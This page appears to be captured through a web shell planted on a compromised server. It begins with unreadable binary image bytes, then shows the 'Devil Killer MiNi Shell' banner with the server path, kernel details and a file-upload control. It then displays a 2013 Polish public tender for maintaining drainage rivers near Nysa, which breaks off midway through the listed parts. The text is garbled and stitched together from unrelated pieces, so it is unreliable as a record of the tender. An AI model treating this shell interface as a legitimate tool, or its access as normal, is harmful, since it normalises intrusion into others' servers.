JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130621/120417-N-2013.html

<p class="kh_header"><b>Opole: Utrzymanie urządzeń melioracji wodnych podstawowych na terenie działania WZMIUW w Opolu Oddział w Nysie</b><br>
<b>Numer ogłoszenia: 120417 - 2013; data zamieszczenia: 21.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Opolu , ul. Katowicka 55, 45-061 Opole, woj. opolskie, tel. 077 4425742, faks 077 4425726.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wzmiuw.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie urządzeń melioracji wodnych podstawowych na terenie działania WZMIUW w Opolu Oddział w Nysie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  wykonanie konserwacji urzadzeń melioracji podstawowych na terenie działania WZMiUW w Opolu Oddział w Nysie.
część 1. rz. Cielnica EL I w km 0+000+0+500, L=500 mb, wsie: Giełczyce gm.Skoroszyce
Część 2. rz. Cielnica EL II w km 10+050-14+600, L=4 600 mb, Prusinowice, gm. Pakosławice
Część 3. rz. Głuchołaski EL I w km 0+000-0+900,2+500-2+600,3+300-3+900 L=1 600mb,m. Głuchołazy,Konradów gm Głuchołazy
Część 4. rz.Mora EL I w km 0+100-1+650, L=1550 mb, m.Morów, gm. Nysa
Część 5. rz. Mora EL II w km 7+300-15+900 L=8 600 mb m.Łączki,Biskupów,Burgrabice,Sławniowice, gm. Głuchołazy
Część 6. Wigancicki Potok w km 7+630-10+960 L= 3 330 mb- m.Wilemowice,Chciebórz,gm.Kamiennik                                                             Część 7. Kamienica EL I w km 5+400-11+190 L=5 790mb  m.Wyszków Niwnica gm.Nysa 
Część 8. Domaszkowicki EL I w km 0+000-6+400 L=6 400mb m.Kubice Domaszkowice gm Nysa
Część 9.  Lubiatowki w km 0+000-5+100 m.Lubiatów gm. Otmuchów    
Część 10. Biała Woda w km 0+000-7+725 L= 7 725 mbm.Paczków,Kamienica gm.Paczków
Część 11. Kanał Ulgi rzeki Świdna w km 0+000 - 1+600 L= 1 600 mb m.Meszno gm.Otmuchów 
Część 12. Czerwona Woda w km 0+000- 4+480 L=4 480 mb m.Ujeździec,Lisie Kąty gm Paczków 
Część 13. Tarnawka w km 0+000-8+500 L=8 500 mb m.Stary Paczków,Unikowice.Gościce gm Paczków  
Część 14. Kanał Ulgi rzeki Tarnawka w km0+000 - 2+825 L=2 825mb m.Paczków,Gościce gm Paczków.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 15.07.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstepuje od żądania wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek nie będzie oceniany</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia będzie uznany za spełniony, jeżeli Wykonawca wykaże: 
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będą ich łączne kwalifikacje i doświadczenie):
wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 1 roboty budowlanej, której przedmiotem zamówienia było wykonanie konserwacji, remontu lub odbudowy rzeki.
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót sporządzony według wzoru stanowiącego załącznik nr 4 do niniejszej IDW oraz dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Zaleca się, aby przedkładane dokumenty potwierdzające, że wykonane przez Wykonawców roboty zostały wykonane w sposób należyty oraz wskazujące, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, zawierały, co najmniej:
a. wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował roboty, których dokumenty dotyczą,
b. wskazanie podmiotu, na rzecz którego realizowane były roboty,
c. wskazanie zakresu robót,
d. wskazanie wartości robót,
e. wskazanie daty wykonania (rozpoczęcia i zakończenia),
f. wskazanie miejsca wykonania, 
g. opinię podmiotu wskazanego powyżej w pkt. b stwierdzającą, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;

W przypadku, gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane zostały wcześniej wykonane wykonawca nie ma obowiązku przedkładania dokumentów potwierdzających ich należyte wykonanie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania niniejszego zamówienia będzie uznany za spełniony, jeżeli Wykonawca: 
wskaże do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby/podmioty wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności:
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy):
(1) Kierownik Robót - posiadający:
- wykształcenie w zakresie melioracji, budowli hydrotechnicznych lub budownictwa. 
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy  zobowiązani są przedłożyć: 
- wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej IDW,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie oceniany wspólnie z warunkiem potencjał techniczny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek nie będzie oceniany.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastapić za zgodą obu stron wyrażoną na piśmie w formie aneksu do umowy pod rygorem nieważności takiej zmiany, w niżej wymienionych przypadkach:
zmiany terminu realizacji:
1) z powodu działania siły wyższej mające bezpośredni wpływ na terminowość wykonania robót, np. klęski żywiołowe,
2) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron;
3) z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa;
4) z powodu uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
5) z powodu wystąpienia dodatkowych okoliczności, a niemożliwych do przewidzenia przed zawarciem umowy pomimo zachowania należytej staranności;
6) z powodu niekorzystnych warunków atmosferycznych, z wyłączeniem warunków atmosferycznych typowych dla danej pory roku, które uniemożliwiają realizację przedmiotu umowy zgodnie z obowiązującymi przepisami (warunkami technicznymi - normami);
7) z powodu zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy;
zmiany wynagrodzenia:
- w przypadku zmiany technologii wykonania robót, na wniosek Wykonawcy lub Zamawiającego i pod warunkiem, że zmiana ta będzie korzystna dla Zamawiającego,
- w przypadku odstąpienia na wniosek Zamawiającego od realizacji części robót,
- w przypadku niewykonania przez Wykonawcę części robót.
Niezależnie od powyższego, Zamawiający i Wykonawca dopuszczają możliwość zmian umowy w następujących przypadkach:
1) zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych stron ujawnionych w rejestrach publicznych. W takiej sytuacji, Zamawiający i Wykonawca wprowadzą do Umowy stosowne zmiany redakcyjne weryfikujące dotychczasowe jego brzmienie bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych;
2) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;
3) zmian kluczowego personelu Wykonawcy i Zamawiającego;
4) zmian jakości lub innych parametrów charakterystycznych dla danego elementu robót lub zmiany technologii, jeśli jest to uzasadnione dla prawidłowego wykonania robót;
5) zmiany zakresu przedmiotu umowy lub rezygnacji z części robót jeżeli będzie to uzasadnione dla prawidłowej realizacji przedmiotu umowy lub uzyskania założonego efektu;
6) zmiany innych warunków umowy jeżeli w chwili zawarcia umowy nie znane były fakty mające na nie wpływ, przy jednoczesnym założeniu, że zakres zmian spowoduje następstwa korzystne dla Zamawiającego.

Zmiana wynagrodzenia, o którym mowa w ust. 1 pkt 2 lit. a-c nastąpi na podstawie wyceny robót niewykonanych dokonanej w oparciu o stawki, ceny jednostkowe, narzuty i materiały z kosztorysu Wykonawcy przygotowanego zgodnie z postanowieniami SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wzmiuw.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Opolu
Oddział w Nysie
ul Fałata 6a
48-300 Nysa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2013 godzina 08:00, miejsce: Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Opolu
Oddział w Nysie
ul Fałata 6a
48-300 Nysa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Cielnica EL I w km 0+000+0+500, L=500 mb, wsie: Giełczyce gm.Skoroszyce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
Ręczne wykoszenie porostów gęstych twardych ze skarp.
- Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
- Ręczne ścinanie i karczowanie zagajników gęstych wraz ze zrąbkowaniem.
- Odmulenie koparko-odmularkami cieków o szer. dna do 4,0 m. Grub. warstwy odmulającej 20 cm wraz z uzupełnieniem ubytków skarp i ich profilowanie
- Mechaniczne karczowanie drzew o śred 16-25 wraz ze zrąbkowaniem gałęzi
- Wywóz dłużyc na odl na odl 10 km
Termin realizacji robót: -  od 15.07.2013r. do 16.08.2013r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Cielnica EL II w km 10+050-14+600, L=4 600 mb, Prusinowice, gm. Pakosławice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
- Ręczne wykoszenie porostów gęstych twardych ze skarp.
- Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
- Ręczne ścinanie rzadkich krzaków ze skarp wraz ze zrąbkowaniem
- Usuwanie namułu grubości 20 cm z cieków o głębokości do 1,50m                       i szerokości dna 1,60 m
- Usuwanie namułu grubości 20 cm z cieków o głębokości do 1,50m                       i szerokości dna 1,20 m 
Termin realizacji robót: -  od 15.07.2013r. do 13.09.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Głuchołaski EL I w km 0+000-0+900,2+500-2+600,3+300-3+900 L=1 600mb,     m. Głuchołazy,Konradów gm Głuchołazy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
- Ręczne wykoszenie porostów gęstych twardych ze skarp.
- Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.wraz z załadunkiem na środki transportowe
- Odmulenie ręczne cieku o szer do 2,0m zamulenie śred.do 20 cm z przewozem taczkami na odl 160m
- Załadunek z hałdy dowiezionego namułu koparkami chwytakowymi z odwozem urobku samochodami na odl 5,0 km
- Oczyszczenie wszystkich ubezpieczonych powierzchni skarp rzeki
- Ścinanie drzew piłą spalinową o śred 16-25 cm
- Ręczne wycinanie zakrzaczeń ze skarp porost gęsty wraz ze zrąbkowaniem
- Wywóz dłużyc na odl.10 km
- Umocnienie skarp i dna płytami - naprawa ubytków
Termin realizacji robót: od 15.07.2013r. do 13.09.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mora EL I w km 0+100-1+650, L=1550 mb, m.Morów, gm. Nysa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:

- Ręczne wykoszenie porostów gęstych twardych ze skarp.
- Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
- Usuwanie zatorów z koryta
- Ręczne ścinanie i karczowanie zagajników gęstych
Termin realizacji robót: od 15.07.2013r. do 16.08.2013r.</p></li>
